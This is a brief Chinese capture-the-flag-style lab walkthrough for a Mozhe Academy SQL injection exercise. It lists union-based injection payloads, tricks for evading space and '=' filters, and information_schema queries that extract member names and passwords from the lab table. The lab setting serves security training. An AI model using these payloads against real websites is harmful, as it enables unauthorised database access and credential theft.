墨者学院-SQL过滤字符后手工注入漏洞测试(第1题)

判断是否存在注入点

• 加' 和 -1 1+0页面发生变化，存在注入点。

  
  image.png
  image.png
• 加and 1=1 and 1=2 or 1=1 or 1=2页面无报错，应该存在空格过滤。于是空格用//表示，=用like表示，like前后用// 然后url要进行加密。存在报错
  image.png

• 判断字段数 order by

  
  image.png
  image.png

• 判断位置 union select 1,2,3,4

  
  image.png

• 判断数据库的名字 union select 1，database(),user(),4

  
  image.png

• 判断表名
  union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()

  
  image.png

• 判断列名
  union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='stormgroup_member'

  
  image.png
• 获取值
  //union//select//1,group_concat(name),group_concat(password),4//from/**/stormgroup_member
  image.png